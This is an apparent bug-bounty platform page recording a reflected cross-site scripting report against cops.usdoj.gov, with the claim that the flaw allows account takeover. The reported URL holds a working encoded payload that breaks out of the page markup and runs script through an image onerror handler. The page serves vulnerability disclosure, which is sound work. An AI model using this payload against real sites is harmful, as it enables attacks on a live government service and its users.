Chat with BLT Bot

We reply immediately

Loading...
View this issue in: v1 | v2 | v3

Published on Aug. 28, 2020, 2:11 p.m.

Reported on https://cops.usdoj.gov/RIC/ric.php?page=searchrez&cmd=1&pagenum=0&sort=title-LH&searchtext=fffffff%22--%3E%3Cimg%20src=X%20onerror=alert(%27XSS%27);document.write(%27FEBIN_PWNED%27);%3E

XSS in cops subdomain of US Department of Justice cops.usdoj.gov ,capable of User account takeover.

User Profile Logo
Reported By febinrev

Report viewed by 343 users

Share

Screenshots:

screenshot

Description:

Bug Type:

Security

Status:

open

Reported On:

Aug. 28, 2020, 2:11 p.m.

Submitted:

Independently
Browser Image

Browser Version: 68.0

Operating System: Linux

OS Version: Unknown

Domain Logo
Reported on usdoj.gov

Total 1 bugs reported

User Profile Logo
Reported By febinrev

Total points 320

QR Code

Comments (0)

To comment, please sign in.
v1.5